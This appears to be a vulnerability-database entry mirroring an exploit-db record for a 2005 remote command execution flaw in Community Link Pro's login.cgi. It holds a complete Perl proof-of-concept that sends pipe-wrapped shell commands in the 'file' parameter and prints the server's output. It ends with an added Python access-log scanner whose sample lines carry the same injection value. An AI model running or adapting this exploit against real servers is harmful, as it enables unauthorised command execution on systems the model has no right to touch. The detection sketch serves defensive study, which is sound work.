Community Link Pro – ‘login.cgi?File’ Remote Command Execution


Vulnerability ID 1055211 Vulnerability type
Published 2005-06-29 Updated 2005-06-29
CVE ID N/A
CNNVD-ID N/A
Platform CGI CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/25920
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/14097/info

Community Link Pro is prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.

Due to this, an attacker can prefix arbitrary commands with the '|' character and have them executed in the context of the server. 

#!/usr/bin/perl
# ___                 ___                     __
# _ |__ _____     __| _/______  ____   _____/  |_
#  | __ \__     / __ |_  __ /  _  /  _    __
#  | _ / __ _/ /_/ | |  | (  <_> |  <_> )  |
#  |___  (____  /____ | |__|   ____/ ____/|  | Security Group
#      /     /      /                      ||
#                                             /
# Login.cgi Remote Command Execution PoC Exploit
# by: spher3 - [email protected]
# www.badroot.org

use strict;
use IO::Socket::INET;

sub USAGE()
{
  print "USAGE:\n",
        "perl $0 [host] [path] [cmd]\n\n",
        "EXAMPLE:\n",
        "perl www.site.org /webeditor/ \"uname -a\"\n\n";
  exit 0;
}

USAGE unless $ARGV[2];

my $host = $ARGV[0];

my $path = $ARGV[1];

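# Spaces in the command are replaced with %20 for use in the query string.
my $cmds = join  (  '%20', split  (  / /, $ARGV[2]  )  );

# The command is wrapped in '|' and sent in the "file" parameter of login.cgi.
my $vuln = $path . "login.cgi?username=&command=simple&do=edit&password=&file=|" . $cmds . "|";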

print  "Badroot Security Group - www.badroot.org\n", 
       "Login.cgi Remote Command Execution\n\n",
       "- Target: $host\n",
       "- Path: $path\n\n"; 

my $sock = IO::Socket::INET->new  (  PeerAddr => $host,
                                     PeerPort => 80,
                                     Proto => "tcp",
                                     Type => SOCK_STREAM  ) || die "Error: $!\n";

print $sock "GET " . $vuln ." HTTP/1.1\r\n",
            "Accept: */*\r\n",
            "User-Agent: Bad\r\n", 
            "Host: $host\r\n",
            "Connection: Keep-Alive\r\n\r\n";             

# $lE tracks position in the response: only lines inside the <textarea> element are printed.
my $lE = 0;

while  (  <$sock>  )
{

  if (  $_ =~ /<\/textarea/  )
  {
    $lE = 0;
    close  (  $sock  ) && exit 0;
  }
  
  print $_ if $lE == 2;

  ++$lE if $lE == 1;

  if (  $_ =~ /<textarea/  )
  {
    ++$lE;
  }

}
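
For detection, the request shape sent by the PoC above (a login.cgi request whose file parameter is wrapped in '|') can be searched for in web server access logs. The following Python sketch is an added example, not part of the original advisory or exploit; the combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line as it appears in a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def pipe_in_file_param(log_line):
    """Return the decoded 'file' value when a login.cgi request carries a
    value that starts or ends with '|'; otherwise return None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Match script and parameter names case-insensitively (File vs. file).
    if not url.path.lower().endswith("/login.cgi"):
        return None
    # parse_qsl percent-decodes once, so %7C and a literal '|' look the same.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() != "file":
            continue
        decoded = unquote(value).strip()  # second pass: double-encoded values
        if decoded.startswith("|") or decoded.endswith("|"):
            return decoded
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = pipe_in_file_param(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jun/2005:10:00:01 +0000] "GET /webeditor/login.cgi'
    '?username=&command=simple&do=edit&password=&file=|uname%20-a| HTTP/1.1" 200 512',
    '192.0.2.11 - - [29/Jun/2005:10:00:05 +0000] "GET /webeditor/login.cgi'
    '?username=bob&command=simple&do=edit&password=x&file=index.html HTTP/1.1" 200 2048',
    '192.0.2.12 - - [29/Jun/2005:10:00:09 +0000] "GET /webeditor/Login.cgi'
    '?do=edit&File=%7Cuname+-a%7C HTTP/1.1" 200 498',
    '192.0.2.13 - - [29/Jun/2005:10:00:12 +0000] "GET /docs/a|b.html HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: login.cgi file parameter = {value!r}")
```

Parameters sent in a POST body do not appear in access logs, so this check covers only query-string requests like the one the PoC issues.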
